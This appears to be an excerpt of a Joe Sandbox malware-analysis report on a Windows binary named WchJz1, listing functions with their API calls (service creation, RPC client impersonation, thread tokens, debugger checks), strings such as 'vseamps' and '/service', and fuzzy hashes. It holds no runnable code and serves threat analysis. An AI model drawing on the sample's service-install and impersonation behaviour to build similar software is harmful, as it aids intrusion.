Instruction Fuzzy Hash: 3022CEB2625A8086EB22CF2BF445BEA77A0F78DBC4F444116FB4A476B5DB39C445CB00

Function 0000000140001520 Relevance: 22.8, APIs: 10, Strings: 3, Instructions: 95COMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32 ref: 00000001400015A4
GetLastError.KERNEL32 ref: 00000001400015B2

Part of subcall function 0000000140001430: GetModuleFileNameW.KERNEL32 ref: 000000014000145E
Part of subcall function 0000000140001430: OpenSCManagerW.ADVAPI32 ref: 000000014000146C
Part of subcall function 0000000140001430: GetLastError.KERNEL32 ref: 000000014000147A

Strings

/service, xrefs: 000000014000153F
vseamps, xrefs: 0000000140001538
/remove, xrefs: 000000014000157E

Memory Dump Source

Source File: 00000004.00000002.2136663454.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2136650839.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136680327.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136693358.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136706253.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_WchJz1.jbxd

Similarity

API ID: ErrorLastManagerOpen$FileModuleName
String ID: /remove$/service$vseamps
API String ID: 67513587-3839141145
Opcode ID: 39fa17c263662ab8de8707f1fae5283c28ed51da3e4186f1b0bc27974e33e859
Instruction ID: ba5f49d8dd96f1c36e401cc1f7cdff7269c229e2e129f463089a9495e32f08e5
Opcode Fuzzy Hash: 39fa17c263662ab8de8707f1fae5283c28ed51da3e4186f1b0bc27974e33e859
Instruction Fuzzy Hash: F031E9B2708B4086EB42DF67B84439AA3A1F78CBD4F480025FF5947B7AEE79C5558704

Function 000000014000F000 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 152libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F042
GetProcAddress.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F05E
GetProcAddress.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F086
GetProcAddress.KERNEL32(?,?,?,?,?,?,000000FF,00000000,00000001,00000001400094C9,?,?,?,00000000,00000001,000000014000961C), ref: 000000014000F0A5
GetProcAddress.KERNEL32 ref: 000000014000F0F3
GetProcAddress.KERNEL32 ref: 000000014000F117

Part of subcall function 00000001400073E0: LdrLoadDll.NTDLL ref: 00000001400073E2

Strings

MessageBoxA, xrefs: 000000014000F054
GetActiveWindow, xrefs: 000000014000F075
GetUserObjectInformationA, xrefs: 000000014000F0E9
USER32.DLL, xrefs: 000000014000F03B
GetProcessWindowStation, xrefs: 000000014000F10D
GetLastActivePopup, xrefs: 000000014000F094

Memory Dump Source

Source File: 00000004.00000002.2136663454.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2136650839.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136680327.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136693358.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136706253.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_WchJz1.jbxd

Similarity

API ID: AddressProc$Load$Library
String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$USER32.DLL
API String ID: 3981747205-232180764
Opcode ID: a4a8166f7fb3539f2a033069c8db60d0a751c3badd5dc7e485aee673dfe3cd32
Instruction ID: 2f5902004a3f6de811dc5f380475ae1a3efdd32c0186a6d00da0f9ae6c345c7d
Opcode Fuzzy Hash: a4a8166f7fb3539f2a033069c8db60d0a751c3badd5dc7e485aee673dfe3cd32
Instruction Fuzzy Hash: FE515CB561674181FE66EB63B850BFA2290BB8D7D0F484025BF4E4BBB1EF3DC445A210

Function 00000001400022C0 Relevance: 15.1, APIs: 10, Instructions: 96threadCOMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32 ref: 0000000140002315
CreateEventW.KERNEL32 ref: 0000000140002326
CreateEventW.KERNEL32 ref: 0000000140002340
CreateEventW.KERNEL32 ref: 000000014000235E
RpcImpersonateClient.RPCRT4 ref: 0000000140002372
GetCurrentThread.KERNEL32 ref: 0000000140002390
OpenThreadToken.ADVAPI32 ref: 00000001400023A7
RpcRevertToSelfEx.RPCRT4 ref: 0000000140002402

Memory Dump Source

Source File: 00000004.00000002.2136663454.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2136650839.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136680327.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136693358.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136706253.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_WchJz1.jbxd

Similarity

API ID: CreateEvent$Thread$ClientCriticalCurrentImpersonateInitializeOpenRevertSectionSelfToken
String ID:
API String ID: 4284112124-0
Opcode ID: edd1c8558eeb60cdd671b70c13388f4905a0e10de3bd345b1359afa696ffe28d
Instruction ID: d1cc2c0b88e239984ef66edc10b99dba483783d79de04edfe0f0364e5ac1fb7c
Opcode Fuzzy Hash: edd1c8558eeb60cdd671b70c13388f4905a0e10de3bd345b1359afa696ffe28d
Instruction Fuzzy Hash: 65415D72604B408AE351CF66F88479EB7A0F78CB94F508129EB8A47B74CF79D595CB40

Function 0000000140001430 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 52serviceCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32 ref: 000000014000145E
OpenSCManagerW.ADVAPI32 ref: 000000014000146C
GetLastError.KERNEL32 ref: 000000014000147A
CreateServiceW.ADVAPI32 ref: 00000001400014D4
CloseServiceHandle.ADVAPI32 ref: 00000001400014E2
CloseServiceHandle.ADVAPI32 ref: 00000001400014F5

Strings

vseamps, xrefs: 00000001400014AD, 00000001400014B4

Memory Dump Source

Source File: 00000004.00000002.2136663454.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2136650839.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136680327.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136693358.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136706253.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_WchJz1.jbxd

Similarity

API ID: Service$CloseHandle$CreateErrorFileLastManagerModuleNameOpen
String ID: vseamps
API String ID: 3693165506-3944098904
Opcode ID: 37866f258d51cd6cd84815c45d3eaefe281d6d9a8e40d6c1e65e6d09f5d7cdba
Instruction ID: 61898eac7960aa5413d410c65d13376abce5a62f28ec8a6c68938921ced9de71
Opcode Fuzzy Hash: 37866f258d51cd6cd84815c45d3eaefe281d6d9a8e40d6c1e65e6d09f5d7cdba
Instruction Fuzzy Hash: F321FCB1204B8086EB56CF66F88439A73A4F78C784F544129E7894B774DF7DC149CB00

Function 0000000140009300 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 154COMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(?,?,?,00000000,00000001,000000014000961C,?,?,?,?,?,?,0000000140009131,?,?,00000001), ref: 00000001400093CF

Strings

<program name unknown>, xrefs: 00000001400093D9
..., xrefs: 0000000140009431
Microsoft Visual C++ Runtime Library, xrefs: 00000001400094B4
Runtime Error!Program: , xrefs: 000000014000938D

Memory Dump Source

Source File: 00000004.00000002.2136663454.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2136650839.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136680327.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136693358.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136706253.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_WchJz1.jbxd

Similarity

API ID: FileModuleName
String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
API String ID: 514040917-4022980321
Opcode ID: 1d01bebd6d090e025827d9f03818fc87fa6a91df27b235dcc59e95ab31d19661
Instruction ID: eb4045a5a240d2828a775daba1198261b01968dd91f8e387fbd6cb4ec0284cf4
Opcode Fuzzy Hash: 1d01bebd6d090e025827d9f03818fc87fa6a91df27b235dcc59e95ab31d19661
Instruction Fuzzy Hash: F851EFB131464042FB26DB2BB851BEA2391A78D7E0F484225BF2947AF2DF39C642C304

Function 000000014000BB70 Relevance: 12.3, APIs: 8, Instructions: 256COMMON

Download Yara Rule

APIs

LCMapStringW.KERNEL32 ref: 000000014000BBDC
GetLastError.KERNEL32 ref: 000000014000BBEC
LCMapStringW.KERNEL32 ref: 000000014000BC5F
WideCharToMultiByte.KERNEL32 ref: 000000014000BCC8
WideCharToMultiByte.KERNEL32 ref: 000000014000BD80
LCMapStringA.KERNEL32 ref: 000000014000BDA3

Part of subcall function 00000001400090F0: HeapAlloc.KERNEL32(?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423,?,?,?,000000014000FC9E), ref: 0000000140009151

LCMapStringA.KERNEL32 ref: 000000014000BE48
MultiByteToWideChar.KERNEL32 ref: 000000014000BEC8

Memory Dump Source

Source File: 00000004.00000002.2136663454.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2136650839.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136680327.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136693358.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136706253.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_WchJz1.jbxd

Similarity

API ID: String$ByteCharMultiWide$AllocErrorHeapLast
String ID:
API String ID: 2057259594-0
Opcode ID: d3ef643e943a21760fc28678b116a7f08da1d9f04a09311d9013e3bfd6c4d4e3
Instruction ID: f9b9a5bb90e2e08b647a9eb75fc4ff4e18af91537db3c322e1916602633d995e
Opcode Fuzzy Hash: d3ef643e943a21760fc28678b116a7f08da1d9f04a09311d9013e3bfd6c4d4e3
Instruction Fuzzy Hash: B6A16AB22046808AEB66DF27E8407EA77E5F74CBE8F144625FB6947BE4DB78C5408700

Function 0000000140005A70 Relevance: 12.2, APIs: 8, Instructions: 163memoryCOMMON

Download Yara Rule

APIs

GetStartupInfoW.KERNEL32 ref: 0000000140005A8B
GetProcessHeap.KERNEL32 ref: 0000000140005A92
HeapAlloc.KERNEL32 ref: 0000000140005AA3
GetVersionExA.KERNEL32 ref: 0000000140005AE6
GetProcessHeap.KERNEL32 ref: 0000000140005AF0
HeapFree.KERNEL32 ref: 0000000140005AFE
GetProcessHeap.KERNEL32 ref: 0000000140005B22
HeapFree.KERNEL32 ref: 0000000140005B30

Memory Dump Source

Source File: 00000004.00000002.2136663454.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2136650839.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136680327.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136693358.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136706253.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_WchJz1.jbxd

Similarity

API ID: Heap$Process$Free$AllocInfoStartupVersion
String ID:
API String ID: 3103264659-0
Opcode ID: b926c3abaa2c479ec326760b90e5a1fd11221ebaffc6337adf83b77cd4a46ae1
Instruction ID: 8fdcf1cc106887877eb8bf0912cd84dfc65bead55acac366e092854278e1a3ce
Opcode Fuzzy Hash: b926c3abaa2c479ec326760b90e5a1fd11221ebaffc6337adf83b77cd4a46ae1
Instruction Fuzzy Hash: 0F7167B1604A418AF767EBA3B8557EA2291BB8D7C5F084039FB45472F2EF39C440C741

Function 00007FFE11BD2630 Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FFE11BD264C
RtlCaptureContext.KERNEL32 ref: 00007FFE11BD2679
RtlLookupFunctionEntry.KERNEL32 ref: 00007FFE11BD2693
RtlVirtualUnwind.KERNEL32 ref: 00007FFE11BD26D4
IsDebuggerPresent.KERNEL32 ref: 00007FFE11BD2728
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FFE11BD2745
UnhandledExceptionFilter.KERNEL32 ref: 00007FFE11BD2750

Memory Dump Source

Source File: 00000004.00000002.2136731796.00007FFE11BD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE11BD0000, based on PE: true

Associated: 00000004.00000002.2136719357.00007FFE11BD0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2136747858.00007FFE11BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2136763265.00007FFE11BED000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2136776015.00007FFE11BEF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe11bd0000_WchJz1.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 710f6283529bc39a5878960356047a6e461f095b9b13c17159f2665477d47395
Instruction ID: fc3c1c4f087c05b1d168004845ce7e9c08d8612908b7bb0eb42003f00b6ce297
Opcode Fuzzy Hash: 710f6283529bc39a5878960356047a6e461f095b9b13c17159f2665477d47395
Instruction Fuzzy Hash: 58314C72609F81CAEB748F61E8407E92365FB84758F44507ADA4E47BA5DF7CC648C710

Function 0000000140007C91 Relevance: 9.1, APIs: 6, Instructions: 137COMMON

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 0000000140007D66
IsDebuggerPresent.KERNEL32 ref: 0000000140007DAA
SetUnhandledExceptionFilter.KERNEL32 ref: 0000000140007DB4
UnhandledExceptionFilter.KERNEL32 ref: 0000000140007DBF
GetCurrentProcess.KERNEL32 ref: 0000000140007DD5
TerminateProcess.KERNEL32 ref: 0000000140007DE3

Memory Dump Source

Source File: 00000004.00000002.2136663454.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2136650839.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136680327.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136693358.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136706253.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_WchJz1.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerPresentTerminate
String ID:
API String ID: 1269745586-0
Opcode ID: 971e421c69f8e6a9c7be80a9fd1684b11f1d9217f6c56614116cebe2abaa4248
Instruction ID: e2ab3ef72b7f240c54b21dbf897bf6525f512fe4427dd1c0d247b710ac710d4c
Opcode Fuzzy Hash: 971e421c69f8e6a9c7be80a9fd1684b11f1d9217f6c56614116cebe2abaa4248
Instruction Fuzzy Hash: 53115972608B8186D7129F62F8407CE77B0FB89B91F854122EB8A43765EF3DC845CB00

Function 00007FFE11BD76E0 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FFE11BD7759
RtlLookupFunctionEntry.KERNEL32 ref: 00007FFE11BD7771
RtlVirtualUnwind.KERNEL32 ref: 00007FFE11BD77AC
IsDebuggerPresent.KERNEL32 ref: 00007FFE11BD77E5
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FFE11BD77EF
UnhandledExceptionFilter.KERNEL32 ref: 00007FFE11BD77FA

Memory Dump Source

Source File: 00000004.00000002.2136731796.00007FFE11BD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE11BD0000, based on PE: true

Associated: 00000004.00000002.2136719357.00007FFE11BD0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2136747858.00007FFE11BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2136763265.00007FFE11BED000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2136776015.00007FFE11BEF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe11bd0000_WchJz1.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 5eef0cc7783b0be87f0727cc0123e63361c6ac4350bb89c20972030a757485fe
Instruction ID: 0ddaaaa9d63adde6df62c97a93f34fe94d35c49eb1c4560f8adf6e22ba89cdd3
Opcode Fuzzy Hash: 5eef0cc7783b0be87f0727cc0123e63361c6ac4350bb89c20972030a757485fe
Instruction Fuzzy Hash: 50316D32619F81C5DB64CF26E8406EE27A9FB88768F501575EA9D43BA9DF3CC145CB00

Function 000000014000A370 Relevance: 7.5, APIs: 5, Instructions: 41timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 000000014000A3AF
GetCurrentProcessId.KERNEL32 ref: 000000014000A3BA
GetCurrentThreadId.KERNEL32 ref: 000000014000A3C6
GetTickCount.KERNEL32 ref: 000000014000A3D2
QueryPerformanceCounter.KERNEL32 ref: 000000014000A3E3

Memory Dump Source

Source File: 00000004.00000002.2136663454.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2136650839.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136680327.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136693358.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136706253.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_WchJz1.jbxd

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
String ID:
API String ID: 1445889803-0
Opcode ID: 348833bf0fd47251ec8459b694c57c39dac6eb63685dc4ebaa15df7501b8973f
Instruction ID: 72e860a1e5610cf2f60718b33953b9e9cfa3de8eae9ff42976e828aecb981d5d
Opcode Fuzzy Hash: 348833bf0fd47251ec8459b694c57c39dac6eb63685dc4ebaa15df7501b8973f
Instruction Fuzzy Hash: 4101F775255B4082EB928F26F9403957360F74EBA0F456220FFAE4B7B4DA3DCA958700

Function 0000000140004630 Relevance: 5.1, APIs: 4, Instructions: 80memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(?,?,?,00000001400047BB,?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 00000001400046B0
HeapReAlloc.KERNEL32(?,?,?,00000001400047BB,?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 00000001400046C1

Memory Dump Source

Source File: 00000004.00000002.2136663454.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2136650839.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136680327.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136693358.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136706253.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_WchJz1.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: e1b55434e6231e5ce6780f684ad3576ffb26ff33b9fae7a8d56a49fd816118fb
Instruction ID: 02c5a1d02253778f48d8bcd65850d79aa5baad65f26a42f950a3123f4edab52d
Opcode Fuzzy Hash: e1b55434e6231e5ce6780f684ad3576ffb26ff33b9fae7a8d56a49fd816118fb
Instruction Fuzzy Hash: CB31D1B2715A8082EB06CF57F44039863A0F74DBC4F584025EF5D57B69EB39C8A28704

Function 00000001400106B0 Relevance: 4.5, APIs: 3, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00000001400106EF
SetUnhandledExceptionFilter.KERNEL32 ref: 0000000140010735
UnhandledExceptionFilter.KERNEL32 ref: 0000000140010740

Memory Dump Source

Source File: 00000004.00000002.2136663454.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2136650839.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136680327.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136693358.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136706253.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_WchJz1.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContext
String ID:
API String ID: 2202868296-0
Opcode ID: 905f91afdcc57dbacad6504ae7f65679640b92e152865c9b61e81d303733290d
Instruction ID: a6869a7b9d4117274e99734abe304e52ce4a6a571683f9898e15e7d65764808a
Opcode Fuzzy Hash: 905f91afdcc57dbacad6504ae7f65679640b92e152865c9b61e81d303733290d
Instruction Fuzzy Hash: 44014C31218A8482E7269B62F4543DA62A0FBCD385F440129B78E0B6F6DF3DC544CB01

Function 00007FFE11BE0248 Relevance: 3.2, APIs: 2, Instructions: 227COMMONLIBRARYCODE

Download Yara Rule

APIs

_clrfp.LIBCMT ref: 00007FFE11BE0497
RaiseException.KERNEL32 ref: 00007FFE11BE04A8

Memory Dump Source

Source File: 00000004.00000002.2136731796.00007FFE11BD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE11BD0000, based on PE: true

Associated: 00000004.00000002.2136719357.00007FFE11BD0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2136747858.00007FFE11BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2136763265.00007FFE11BED000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2136776015.00007FFE11BEF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe11bd0000_WchJz1.jbxd

Similarity

API ID: ExceptionRaise_clrfp
String ID:
API String ID: 15204871-0
Opcode ID: 242015c6cea6594ab8d644b6eea7da2ef8062d64434110bbd4fb3fd5cf8f1a15
Instruction ID: 36c984a6949e79b0826e04f726d444f0463acafd5c273be909212e774db02cb4
Opcode Fuzzy Hash: 242015c6cea6594ab8d644b6eea7da2ef8062d64434110bbd4fb3fd5cf8f1a15
Instruction Fuzzy Hash: 05B14573609B89CBEB25CF2AC88676C3BA0F784B58F149965DA5D837A4CB3DD451C700

Function 00000001400103D0 Relevance: 3.2, APIs: 2, Instructions: 183COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32 ref: 00000001400105C2
GetLastError.KERNEL32 ref: 00000001400105ED

Memory Dump Source

Source File: 00000004.00000002.2136663454.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2136650839.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136680327.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136693358.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136706253.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_WchJz1.jbxd

Similarity

API ID: ByteCharErrorLastMultiWide
String ID:
API String ID: 203985260-0
Opcode ID: 52eb8cb33472843dab3d23723d723ebc9e780f32240a0bf22a1f45fa5c529dea
Instruction ID: 2a1840496c7657cf23b6901bcaaf21815035fe120b0a860a82176d8039cbaff9
Opcode Fuzzy Hash: 52eb8cb33472843dab3d23723d723ebc9e780f32240a0bf22a1f45fa5c529dea
Instruction Fuzzy Hash: C871DF72A04AA086F7A3DF12E441BDA72A1F78CBD4F148121FF880B7A5DB798851CB10

Function 0000000140010CF0 Relevance: 3.1, APIs: 2, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2136663454.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2136650839.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136680327.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136693358.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136706253.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_WchJz1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a23616b521790ba98c8a4ca650accd459689c226ef9c151115ac5421c5afe981
Instruction ID: 31705e6bd3fe747407dbe92e60a9b5f63bdbefd7c066999fadf2412e4a74ef82
Opcode Fuzzy Hash: a23616b521790ba98c8a4ca650accd459689c226ef9c151115ac5421c5afe981
Instruction Fuzzy Hash: BD312B3260066442F723AF77F845BDE7651AB987E0F254224BB690B7F2CFB9C4418300

Function 00007FFE11BDA1B8 Relevance: 1.6, APIs: 1, Instructions: 149COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2136731796.00007FFE11BD1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE11BD0000, based on PE: true

Associated: 00000004.00000002.2136719357.00007FFE11BD0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2136747858.00007FFE11BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2136763265.00007FFE11BED000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2136776015.00007FFE11BEF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffe11bd0000_WchJz1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a2880f174246bb62df44fff46a4d3d73a1dc8eca39573d4fb70521656c567db
Instruction ID: 3055b7038c4533749f00d763a4f6c5cc7fa174ec517530401d951bf32f63ad91
Opcode Fuzzy Hash: 4a2880f174246bb62df44fff46a4d3d73a1dc8eca39573d4fb70521656c567db
Instruction Fuzzy Hash: C851D522B08A91C5EF349F73A8449EE7BA9AB40BA8F545175EE5C27AA5DF3CD401C700

Function 0000000140011270 Relevance: 1.6, APIs: 1, Instructions: 84COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlLookupFunctionEntry.KERNEL32 ref: 00000001400112F1

Memory Dump Source

Source File: 00000004.00000002.2136663454.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000004.00000002.2136650839.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136680327.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136693358.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.2136706253.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_140000000_WchJz1.jbxd

Similarity

API ID: EntryFunctionLookup
String ID:
API String ID: 3852435196-0
Opcode ID: 41b57387ab27fe441920d3618a9a3fade831f152bc6ed6de484845005a0f7214
